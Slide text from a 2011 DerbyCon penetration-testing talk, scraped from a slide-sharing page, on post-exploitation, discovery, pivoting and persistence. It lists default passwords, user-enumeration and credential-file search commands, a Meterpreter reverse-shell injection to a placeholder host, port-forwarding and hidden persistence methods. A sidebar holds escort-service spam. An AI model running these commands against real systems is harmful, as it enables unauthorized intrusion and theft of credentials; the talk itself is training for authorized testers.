Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Chris Gates
 
ColdFusion for Penetration Testers
ColdFusion for Penetration TestersColdFusion for Penetration Testers
ColdFusion for Penetration Testers
Chris Gates
 
MSF Auxiliary Modules
MSF Auxiliary ModulesMSF Auxiliary Modules
MSF Auxiliary Modules
Chris Gates
 
Open Source Information Gathering Brucon Edition
Open Source Information Gathering Brucon EditionOpen Source Information Gathering Brucon Edition
Open Source Information Gathering Brucon Edition
Chris Gates
 
Big Bang Theory: The Evolution of Pentesting High Security Environments
Big Bang Theory: The Evolution of Pentesting High Security EnvironmentsBig Bang Theory: The Evolution of Pentesting High Security Environments
Big Bang Theory: The Evolution of Pentesting High Security Environments
Chris Gates
 
SOURCE Boston --Attacking Oracle Web Applications with Metasploit & wXf
SOURCE Boston --Attacking Oracle Web Applications with Metasploit & wXfSOURCE Boston --Attacking Oracle Web Applications with Metasploit & wXf
SOURCE Boston --Attacking Oracle Web Applications with Metasploit & wXf
Chris Gates
 

More from Chris Gates (20)

Reiki 101 - Defcon29 MHHV
Reiki 101 - Defcon29 MHHVReiki 101 - Defcon29 MHHV
Reiki 101 - Defcon29 MHHV
 
WeirdAAL (Awesome Attack Library) CactusCon 2018
WeirdAAL (Awesome Attack Library) CactusCon 2018WeirdAAL (Awesome Attack Library) CactusCon 2018
WeirdAAL (Awesome Attack Library) CactusCon 2018
 
WeirdAAL (AWS Attack Library)
WeirdAAL (AWS Attack Library) WeirdAAL (AWS Attack Library)
WeirdAAL (AWS Attack Library)
 
Adversarial Simulation Nickerson/Gates Wild West Hacking Fest Oct 2017
Adversarial Simulation Nickerson/Gates Wild West Hacking Fest Oct 2017Adversarial Simulation Nickerson/Gates Wild West Hacking Fest Oct 2017
Adversarial Simulation Nickerson/Gates Wild West Hacking Fest Oct 2017
 
Home Arcade setup (NoVA Hackers)
Home Arcade setup (NoVA Hackers)Home Arcade setup (NoVA Hackers)
Home Arcade setup (NoVA Hackers)
 
DevOOPS: Attacks and Defenses for DevOps Toolchains
DevOOPS: Attacks and Defenses for DevOps ToolchainsDevOOPS: Attacks and Defenses for DevOps Toolchains
DevOOPS: Attacks and Defenses for DevOps Toolchains
 
Open Canary - novahackers
Open Canary - novahackersOpen Canary - novahackers
Open Canary - novahackers
 
Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone Sector...
Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone  Sector...Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone  Sector...
Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone Sector...
 
DevOops Redux Ken Johnson Chris Gates - AppSec USA 2016
DevOops Redux Ken Johnson Chris Gates  - AppSec USA 2016DevOops Redux Ken Johnson Chris Gates  - AppSec USA 2016
DevOops Redux Ken Johnson Chris Gates - AppSec USA 2016
 
DevOops & How I hacked you DevopsDays DC June 2015
DevOops & How I hacked you DevopsDays DC June 2015DevOops & How I hacked you DevopsDays DC June 2015
DevOops & How I hacked you DevopsDays DC June 2015
 
Devoops: DoJ Annual Cybersecurity Training Symposium Edition 2015
Devoops: DoJ Annual Cybersecurity Training Symposium Edition 2015Devoops: DoJ Annual Cybersecurity Training Symposium Edition 2015
Devoops: DoJ Annual Cybersecurity Training Symposium Edition 2015
 
LasCon 2014 DevOoops
LasCon 2014 DevOoops LasCon 2014 DevOoops
LasCon 2014 DevOoops
 
Appsec DC - wXf -2010
Appsec DC - wXf  -2010Appsec DC - wXf  -2010
Appsec DC - wXf -2010
 
Windows attacks - AT is the new black
Windows attacks - AT is the new blackWindows attacks - AT is the new black
Windows attacks - AT is the new black
 
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
 
ColdFusion for Penetration Testers
ColdFusion for Penetration TestersColdFusion for Penetration Testers
ColdFusion for Penetration Testers
 
MSF Auxiliary Modules
MSF Auxiliary ModulesMSF Auxiliary Modules
MSF Auxiliary Modules
 
Open Source Information Gathering Brucon Edition
Open Source Information Gathering Brucon EditionOpen Source Information Gathering Brucon Edition
Open Source Information Gathering Brucon Edition
 
Big Bang Theory: The Evolution of Pentesting High Security Environments
Big Bang Theory: The Evolution of Pentesting High Security EnvironmentsBig Bang Theory: The Evolution of Pentesting High Security Environments
Big Bang Theory: The Evolution of Pentesting High Security Environments
 
SOURCE Boston --Attacking Oracle Web Applications with Metasploit & wXf
SOURCE Boston --Attacking Oracle Web Applications with Metasploit & wXfSOURCE Boston --Attacking Oracle Web Applications with Metasploit & wXf
SOURCE Boston --Attacking Oracle Web Applications with Metasploit & wXf
 

Recently uploaded

Camunda Chapter NY Meetup July 2024.pptx
Camunda Chapter NY Meetup July 2024.pptxCamunda Chapter NY Meetup July 2024.pptx
Camunda Chapter NY Meetup July 2024.pptx
ZachWylie3
 
COVID-19 and the Level of Cloud Computing Adoption: A Study of Sri Lankan Inf...
COVID-19 and the Level of Cloud Computing Adoption: A Study of Sri Lankan Inf...COVID-19 and the Level of Cloud Computing Adoption: A Study of Sri Lankan Inf...
COVID-19 and the Level of Cloud Computing Adoption: A Study of Sri Lankan Inf...
AimanAthambawa1
 
UX Webinar Series: Essentials for Adopting Passkeys as the Foundation of your...
UX Webinar Series: Essentials for Adopting Passkeys as the Foundation of your...UX Webinar Series: Essentials for Adopting Passkeys as the Foundation of your...
UX Webinar Series: Essentials for Adopting Passkeys as the Foundation of your...
FIDO Alliance
 
Redefining Cybersecurity with AI Capabilities
Redefining Cybersecurity with AI CapabilitiesRedefining Cybersecurity with AI Capabilities
Redefining Cybersecurity with AI Capabilities
Priyanka Aash
 
The History of Embeddings & Multimodal Embeddings
The History of Embeddings & Multimodal EmbeddingsThe History of Embeddings & Multimodal Embeddings
The History of Embeddings & Multimodal Embeddings
Zilliz
 
MAKE MONEY ONLINE Unlock Your Income Potential Today.pptx
MAKE MONEY ONLINE Unlock Your Income Potential Today.pptxMAKE MONEY ONLINE Unlock Your Income Potential Today.pptx
MAKE MONEY ONLINE Unlock Your Income Potential Today.pptx
janagijoythi
 
Intel Unveils Core Ultra 200V Lunar chip .pdf
Intel Unveils Core Ultra 200V Lunar chip .pdfIntel Unveils Core Ultra 200V Lunar chip .pdf
Intel Unveils Core Ultra 200V Lunar chip .pdf
Tech Guru
 
How UiPath Discovery Suite supports identification of Agentic Process Automat...
How UiPath Discovery Suite supports identification of Agentic Process Automat...How UiPath Discovery Suite supports identification of Agentic Process Automat...
How UiPath Discovery Suite supports identification of Agentic Process Automat...
DianaGray10
 
Finetuning GenAI For Hacking and Defending
Finetuning GenAI For Hacking and DefendingFinetuning GenAI For Hacking and Defending
Finetuning GenAI For Hacking and Defending
Priyanka Aash
 
LeadMagnet IQ Review: Unlock the Secret to Effortless Traffic and Leads.pdf
LeadMagnet IQ Review:  Unlock the Secret to Effortless Traffic and Leads.pdfLeadMagnet IQ Review:  Unlock the Secret to Effortless Traffic and Leads.pdf
LeadMagnet IQ Review: Unlock the Secret to Effortless Traffic and Leads.pdf
SelfMade bd
 
Mule Experience Hub and Release Channel with Java 17
Mule Experience Hub and Release Channel with Java 17Mule Experience Hub and Release Channel with Java 17
Mule Experience Hub and Release Channel with Java 17
Bhajan Mehta
 
BLOCKCHAIN TECHNOLOGY - Advantages and Disadvantages
BLOCKCHAIN TECHNOLOGY - Advantages and DisadvantagesBLOCKCHAIN TECHNOLOGY - Advantages and Disadvantages
BLOCKCHAIN TECHNOLOGY - Advantages and Disadvantages
SAI KAILASH R
 
Discovery Series - Zero to Hero - Task Mining Session 1
Discovery Series - Zero to Hero - Task Mining Session 1Discovery Series - Zero to Hero - Task Mining Session 1
Discovery Series - Zero to Hero - Task Mining Session 1
DianaGray10
 
Premium Girls Call Mumbai 9920725232 Unlimited Short Providing Girls Service ...
Premium Girls Call Mumbai 9920725232 Unlimited Short Providing Girls Service ...Premium Girls Call Mumbai 9920725232 Unlimited Short Providing Girls Service ...
Premium Girls Call Mumbai 9920725232 Unlimited Short Providing Girls Service ...
shanihomely
 
Mastering Board Best Practices: Essential Skills for Effective Non-profit Lea...
Mastering Board Best Practices: Essential Skills for Effective Non-profit Lea...Mastering Board Best Practices: Essential Skills for Effective Non-profit Lea...
Mastering Board Best Practices: Essential Skills for Effective Non-profit Lea...
OnBoard
 
Google I/O Extended Harare Merged Slides
Google I/O Extended Harare Merged SlidesGoogle I/O Extended Harare Merged Slides
Google I/O Extended Harare Merged Slides
Google Developer Group - Harare
 
Accelerating Migrations = Recommendations
Accelerating Migrations = RecommendationsAccelerating Migrations = Recommendations
Accelerating Migrations = Recommendations
isBullShit
 
Keynote : AI & Future Of Offensive Security
Keynote : AI & Future Of Offensive SecurityKeynote : AI & Future Of Offensive Security
Keynote : AI & Future Of Offensive Security
Priyanka Aash
 
Acumatica vs. Sage Intacct _Construction_July (1).pptx
Acumatica vs. Sage Intacct _Construction_July (1).pptxAcumatica vs. Sage Intacct _Construction_July (1).pptx
Acumatica vs. Sage Intacct _Construction_July (1).pptx
BrainSell Technologies
 
Communications Mining Series - Zero to Hero - Session 3
Communications Mining Series - Zero to Hero - Session 3Communications Mining Series - Zero to Hero - Session 3
Communications Mining Series - Zero to Hero - Session 3
DianaGray10
 

Recently uploaded (20)

Camunda Chapter NY Meetup July 2024.pptx
Camunda Chapter NY Meetup July 2024.pptxCamunda Chapter NY Meetup July 2024.pptx
Camunda Chapter NY Meetup July 2024.pptx
 
COVID-19 and the Level of Cloud Computing Adoption: A Study of Sri Lankan Inf...
COVID-19 and the Level of Cloud Computing Adoption: A Study of Sri Lankan Inf...COVID-19 and the Level of Cloud Computing Adoption: A Study of Sri Lankan Inf...
COVID-19 and the Level of Cloud Computing Adoption: A Study of Sri Lankan Inf...
 
UX Webinar Series: Essentials for Adopting Passkeys as the Foundation of your...
UX Webinar Series: Essentials for Adopting Passkeys as the Foundation of your...UX Webinar Series: Essentials for Adopting Passkeys as the Foundation of your...
UX Webinar Series: Essentials for Adopting Passkeys as the Foundation of your...
 
Redefining Cybersecurity with AI Capabilities
Redefining Cybersecurity with AI CapabilitiesRedefining Cybersecurity with AI Capabilities
Redefining Cybersecurity with AI Capabilities
 
The History of Embeddings & Multimodal Embeddings
The History of Embeddings & Multimodal EmbeddingsThe History of Embeddings & Multimodal Embeddings
The History of Embeddings & Multimodal Embeddings
 
MAKE MONEY ONLINE Unlock Your Income Potential Today.pptx
MAKE MONEY ONLINE Unlock Your Income Potential Today.pptxMAKE MONEY ONLINE Unlock Your Income Potential Today.pptx
MAKE MONEY ONLINE Unlock Your Income Potential Today.pptx
 
Intel Unveils Core Ultra 200V Lunar chip .pdf
Intel Unveils Core Ultra 200V Lunar chip .pdfIntel Unveils Core Ultra 200V Lunar chip .pdf
Intel Unveils Core Ultra 200V Lunar chip .pdf
 
How UiPath Discovery Suite supports identification of Agentic Process Automat...
How UiPath Discovery Suite supports identification of Agentic Process Automat...How UiPath Discovery Suite supports identification of Agentic Process Automat...
How UiPath Discovery Suite supports identification of Agentic Process Automat...
 
Finetuning GenAI For Hacking and Defending
Finetuning GenAI For Hacking and DefendingFinetuning GenAI For Hacking and Defending
Finetuning GenAI For Hacking and Defending
 
LeadMagnet IQ Review: Unlock the Secret to Effortless Traffic and Leads.pdf
LeadMagnet IQ Review:  Unlock the Secret to Effortless Traffic and Leads.pdfLeadMagnet IQ Review:  Unlock the Secret to Effortless Traffic and Leads.pdf
LeadMagnet IQ Review: Unlock the Secret to Effortless Traffic and Leads.pdf
 
Mule Experience Hub and Release Channel with Java 17
Mule Experience Hub and Release Channel with Java 17Mule Experience Hub and Release Channel with Java 17
Mule Experience Hub and Release Channel with Java 17
 
BLOCKCHAIN TECHNOLOGY - Advantages and Disadvantages
BLOCKCHAIN TECHNOLOGY - Advantages and DisadvantagesBLOCKCHAIN TECHNOLOGY - Advantages and Disadvantages
BLOCKCHAIN TECHNOLOGY - Advantages and Disadvantages
 
Discovery Series - Zero to Hero - Task Mining Session 1
Discovery Series - Zero to Hero - Task Mining Session 1Discovery Series - Zero to Hero - Task Mining Session 1
Discovery Series - Zero to Hero - Task Mining Session 1
 
Premium Girls Call Mumbai 9920725232 Unlimited Short Providing Girls Service ...
Premium Girls Call Mumbai 9920725232 Unlimited Short Providing Girls Service ...Premium Girls Call Mumbai 9920725232 Unlimited Short Providing Girls Service ...
Premium Girls Call Mumbai 9920725232 Unlimited Short Providing Girls Service ...
 
Mastering Board Best Practices: Essential Skills for Effective Non-profit Lea...
Mastering Board Best Practices: Essential Skills for Effective Non-profit Lea...Mastering Board Best Practices: Essential Skills for Effective Non-profit Lea...
Mastering Board Best Practices: Essential Skills for Effective Non-profit Lea...
 
Google I/O Extended Harare Merged Slides
Google I/O Extended Harare Merged SlidesGoogle I/O Extended Harare Merged Slides
Google I/O Extended Harare Merged Slides
 
Accelerating Migrations = Recommendations
Accelerating Migrations = RecommendationsAccelerating Migrations = Recommendations
Accelerating Migrations = Recommendations
 
Keynote : AI & Future Of Offensive Security
Keynote : AI & Future Of Offensive SecurityKeynote : AI & Future Of Offensive Security
Keynote : AI & Future Of Offensive Security
 
Acumatica vs. Sage Intacct _Construction_July (1).pptx
Acumatica vs. Sage Intacct _Construction_July (1).pptxAcumatica vs. Sage Intacct _Construction_July (1).pptx
Acumatica vs. Sage Intacct _Construction_July (1).pptx
 
Communications Mining Series - Zero to Hero - Session 3
Communications Mining Series - Zero to Hero - Session 3Communications Mining Series - Zero to Hero - Session 3
Communications Mining Series - Zero to Hero - Session 3
 

The Dirty Little Secrets They Didn’t Teach You In Pentesting Class

  • 1. The Dirty Little Secrets They Didn’t Teach You In Pentesting Class DerbyCon 2011
  • 2. meterpreter> getuid • Chris Gates (CG) – Twitter carnal0wnage – Blog carnal0wnage.attackresearch.com – Job Partner/Principal Security Consultant at Lares – Affiliations  Attack Research, Metasploit • Work • Previous Talks – Attack Oracle (via web) – wXf Web eXploitation Framework – Open Source Information Gathering – Attacking Oracle (via TNS) – Client-Side Attacks
  • 3. meterpreter> getuid • Rob Fuller (mubix) – Twitter -> mubix – Blog -> http://www.room362.com – Job -> Penetration Tester for Rapid7 • Previous Talks – Networking for Penetration Testers – Metasploit Framework/Pro Training for Rapid7 – Deep Magic 101 – Couch to Career in 80 hours
  • 4. The setup… • We do things • You do things • There’s a better way to do things* • Because ‘they’ do them that way • Or… now they will because you are some of ‘they’ • Use what you works for you
  • 5. Domain Admin Or Bust • Usually this means adding yourself as one – (aka fastest way to get caught) • Really just about measuring…
  • 6. Pentesting Goals • What’s our goal? • Vulnerability Driven vs. Data Driven vs. Capability Driven pentest/goal • What’s a *good* goal? – Domain Admin is “A Goal” but it’s a stupid goal. – What makes the client money is a better goal (if you* can identify it) – Problems arise in actually identifying this. What’s important to testers vs client vs bad guys… – Best goal, testing client’s ability to detect & respond to various levels of attackers
  • 7. Majority of ‘Pentesting’ going on today… Run Exploit Report Scanner
  • 8. Majority of ‘Pentesting’ going on today… • Look I got 500+ shells! • And?
  • 10. Is it working? • Who got 0wned? Northrop Grumman: http://www.foxnews.com/scitech/2011/05/31/northrop-grumman-hit-cyber-attack-source-says/ Lockheed Martin: http://packetstormsecurity.org/news/view/19242/March-RSA-Hack-Hits-Lockheed-Remote-Systems- Breached.html L3: http://threatpost.com/en_us/blogs/report-l3-warns-employees-attacks-using-compromised-securid- tokens-060111 Booz Allen Hamilton: http://gizmodo.com/5820049/anonymous-leaks-90000-military-email-accounts-in-latest-antisec-attack SAIC(older): http://www.usatoday.com/news/nation/2007-07-20-saic-security_N.htm
  • 11. Is it working? • Who got 0wned? (recently) DigiNotar: http://www.rijksoverheid.nl/ministeries/bzk/documenten-en- publicaties/rapporten/2011/09/05/diginotar-public-report-version-1.html Texas Police: http://pastebin.com/LGyeLcun Japan Mitsubishi Heavy Industries: http://www.theregister.co.uk/2011/09/22/japan_military_hack_follow_up/ Everyone else (via RSA Employee #15666): http://pastebin.com/yKSQd5Z5 http://hbgary.anonleaks.ch/greg_hbgary_com/26996.html
  • 12. Is it working? Interaction Time!
  • 13. A Better way? Vulnerability Intelligence Gathering Foot Printing Exploitation Post Exploitation Clean Up Analysis http://www.secmaniac.com/files/BSides-StrategicPT-Final.pdf
  • 14. Actual Attack Scenarios Prepwork/ Analysis Post- Intel Exploitation Gathering Exploitation Targeting
  • 15. Actual Attack Scenarios (best case)
  • 16. k, enough fiddle faddle… • IT Security Industry is currently focused on minimizing the presence of vulnerabilities • Consider a change in focus to what attacker tactics/techniques you can detect and respond to • Let’s call this “Capability Driven Security Assessments” • See my BruCon talk with Joe McCray • To do this we need to ramp up post exploitation and stealth
  • 19. Prep Work • Prep work, its awesome, show it some love… – Make your click scripts – Update your stuff – Have script and screen ready to go
  • 20. How many of you have lost a shell because _your_ connection died?
  • 21. Screen • No, not like drug screen… • “Screen is a full-screen window manager that multiplexes a physical terminal between several processes, typically interactive shells.”
  • 22. Screen Commands and Keyboard Shortcuts • screen –S mycustomer • CTRL-A then D (Detach) • screen –ls • screen –x –d mycustomer – attaches to ‘mycustomer’ screen – detaches other ‘attached’ sessions • CTRL-A :multiuser on – (Does not work on Debian based)
  • 23. How many of you have lost a data because your scrollback wasn’t set to be long enough?
  • 24. Script • No, not like java script… – Logs all your stuff – Use it user@ubuntu:~$ script clientname.txt Script started, file is clientname.txt user@ubuntu:~$ exit exit Script done, file is clientname.txt user@ubuntu:~$
  • 26. Discovery Finding stuff to lay the smack down on
  • 27. Quick Tangent Passwords • Your passwords suck
  • 28. Your passwords suck • One of these passwords almost always works… password passw0rd Password $Company1 Password123 $Company123 welcome changeme123 welcome123 p@ssw0rd Username123 p@ssw0rd123 • OK back to it….
  • 29. Nmap Scripts • Obligatory nod to nmap scripts • Best scripts don’t fire off automatically with “-A” • Some of the cooler scripts… – Citrix, NFS, AFP, SNMP, LDAP awesome – Database coverage – http* – Lots of handy stuff, some overlap with MSF aux but some things aux doesn’t have. • Go See Ron’s talk on Sunday
  • 30. Nmap Scripts • (removed citrix-enum-app-xml pic)
  • 32. Nmap Scripts • Oracle • http://seclists.org/nmap-dev/2011/q3/546
  • 33. Nmap Scripts • Ldap • http://seclists.org/nmap-dev/2011/q3/510
  • 34. MSF Auxiliary Modules • Metasploit Aux modules are awesome • Handle all the BS for you • Uses lib/rex ==“Ruby EXploitation library” – Basic library for most tasks – Sockets, protocols, command shell interface – SSL, SMB, HTTP, XOR, Base64, random text – Intended to be useful outside of the framework • Lib/rex ported to a ruby gem! – Can make use of rex outside of MSF if so desired
  • 35. MSF Auxiliary Modules • Designed to help with reconnaissance • Dozens of useful service scanners • Simple module format, easy to use • Specify THREADS for concurrency – Keep this under 16 for native Windows – 256 is fine on Linux • Uses RHOSTS instead of RHOST
  • 36. MSF Auxiliary Modules • Uses OptAddressRange option class, similar to nmap host specification – 192.168.0.1,3,5-7 • Standard ranges – 192.168.1-7.230 • Same IP on multiple subnets – 192.168.0.* • 0-255 – www.metasploit.com/24 • 0-255 for whatever this resolves to – file:/tmp/ranges.txt • Line separated list of targets
  • 39. MSF Auxiliary Modules • Write your own to solve problems on the fly • You should have been in egyp7’s training
  • 41. Exploitation • We seem ok at this already… • Considering it covered… • Open my email…click that link…you know you want to…k thx bye
  • 43. Post Exploitation Google Docs • http://www.room362.com/blog/2011/9/6/po st-exploitation-command-lists.html • Or http://bitly.com/qrbKQP • Open Source (Anyone can edit them) • Will always be public – (might have to lock down the edit privs based on defacement rate)
  • 44. What is the best persistence method? • Meterpreter? – HTTPS – Pro’s Persistence Agent • MOS_DEF? – Thunderbird SPAM Persistence – DNS, HTTP, HTTPS, etc • CORE Agent? • Wiz-bang custom binary/backdoor? • RAT (probably backdoored in other ways)
  • 45. Nah… this is better
  • 47. More on that later…
  • 48. Hooking your homies up • run multi_meter_inject -pt windows/meterpreter/reverse_tcp -mr 1.2.3.4 -p 80 • Multi-user functionality with armitage/msf pro
  • 50. GOOD • Nmap • Ping • Nessus • Nexpose • Angry IP Scanner? • “net view /domain”
  • 51. BETTER • OSQL • DSQUERY / DSGET (Annoying) – (Joeware) ADFind (less annoying) • nltest
  • 52. BETTER • OSQL – osql –L • Lists all MS SQL servers
  • 53. BETTER • DSQUERY / DSGET (Annoying) – dsquery computer -limit 0 current domain – dsquery user -limit 0 – dsquery computer -limit 0 "DC=company,DC=net" – dsquery user -limit 0 "DC=company,DC=net“ other domain • Or use adfind (joeware)
  • 54. BETTER • nltest – Keeps trying to get you info if one path fails
  • 55. What if CMD.exe is disabled?
  • 57. But… dropping binaries == bad Damn you forensics people! (On exception binaries that blend in)
  • 58. BEST • Use the underlying API • Railgun • Demo – Route – ARPTable – TCPTable
  • 59. Route
  • 62. BEST (Cont’d) • Explain NetDiscovery • Demo NetDiscovery – Highlight SQL, DC, UNIX, Novell selections • Explain DomainDiscovery • Demo DomainDiscovery
  • 64. Quick Tangent • Dig – mini NetDiscovery for just one hostname
  • 65. DomainDiscovery What domains do you have access to? Are they domains? What are the names of all their domain controllers?
  • 67. GOOD • net group “domain admins” /domain • net group “domain admins” /domain:DM • net localgroup Administrators • net group localgroup Administrators /domain • net user domainadmin_username /domain • net user username /domain
  • 68. BETTER • Rpcclient – Enumerate users #!/bin/bash for i in {500..600} do rpcclient -U “user%Password1" -W DOMAIN 1.2.3.4 -c "lookupsids S-1- 5-21-1289870825-1602939633- 2792175544-$i done
  • 70. BEST • Explain UserDiscovery • Demo UserDiscovery • Explain DisplaySessions • Demo DisplaySessions • PVE-Find-AD-User – https://www.corelan.be/index.php/my-free- tools/ad-cs/pve-find-ad-user/
  • 73. Creating Zombies • RunAs – ShellExecute, CreateProcessWith Logon, LogonUser • WCE + runhash32/64 – user level psexec == zombie user & token
  • 74. DEMO • Run executable in memory
  • 75. Remember, you don’t HAVE to do this phase… PRIVILEGE ESCALATION
  • 76. GOOD • getsystem • Post modules – Keyboard layout – Bypassuac • Core Impact / Canvas ship with locals – Honestly a big lacking area for MSF 
  • 77. getsystem has options, use them or loose shells
  • 79. BEST • Just ask for it… • Explain ‘Ask’ module • Looking for the user that has the $stuff • Tasklist – tasklist /V /S $IP /U $user /P $password for /F "skip=3 delims= " %A in ('net view') do tasklist /V /S %A /U $user /P $password
  • 81. BEST • Just ask for it… • Explain ‘Ask’ module • Looking for the user that has the $stuff • Tasklist – tasklist /V /S $IP /U $user /P $password for /F "skip=3 delims= " %A in ('net view') do tasklist /V /S %A /U $user /P $password
  • 82. Locating the data that actually matters… FINDING THE HOPE
  • 83. Searching for Gold (Good) • Dir /s “My Documents” • Dir /s “Desktop” • Dir /s *.pcf • ListDrives
  • 84. Searching for Gold (Good) Searching for files dir c:*password* /s dir c:*competitor* /s dir c:*finance* /s dir c:*risk* /s dir c:*assessment* /s dir c:*.key* /s dir c:*.vsd /s dir c:*.pcf /s dir c:*.ica /s dir c:*.crt /s dir c:*.log /s Search in files findstr /I /N /S /P /C:password * findstr /I /N /S /P /C:secret * findstr /I /N /S /P /C:confidential * findstr /I /N /S /P /C:account * Powershell/WMIC to do it
  • 85. Searching for Gold (Better) • Dumplinks • GetFirefoxCreds • GetPidginCreds • Outlook, IE, Chrome, RDP Password Extraction – Basically the whole ‘credentials’ post module section • SharePoint • Intranet.company.com • Shouts to illwill, Kx499, thelightcosine
  • 86. Searching for Gold (Best) • OpenDLP • Fiction’s Database Searcher • Search in Meterpreter – Uses windows indexing i.e. outlook email • Dir /s $share > filetosearchoffline.txt – Findstr too  – Do what works for you…click scripts rule
  • 87. Kind dumb to stay on the initial point of entry… PIVOTING
  • 88. • Portforwarding – Meterpreter portfwd – Route – Sock4a module + meterpreter session – Pro VPN Pivot? • Portproxy – Built into Windows – netsh interface portproxy>add v4tov4 listenport=25 connectaddress=192.168.0.100 connectport=80 protocol=tcp • Legitimate Access via VPN, Term Server, Citrix, etc
  • 89. One week isn’t showing impact of internal awareness… PERSISTENCE
  • 90. Microsoft has an app for that… Autoruns
  • 91. These won’t show up there… • Smartlocker -> lockout_recorder – http://blog.metasploit.com/2010/12/capturing-windows-logons- with.html • Fxsst.dll – https://blog.mandiant.com/archives/1786 – http://www.room362.com/blog/2011/6/27/fxsstdll-persistence-the- evil-fax-machine.html • Explain gpo_dropper hbgary – http://www.hbgary.com/malware-using-local-group-policy • Explain IPv6 Dropper – http://hak5.org/hack/ipv6-from-the-pentesters-perspective
  • 93. code on github soonish https://github.com/mubix/Not-In- Pentesting-Class
  • 94. Rob Fuller Chris Gates mubix carnal0wnage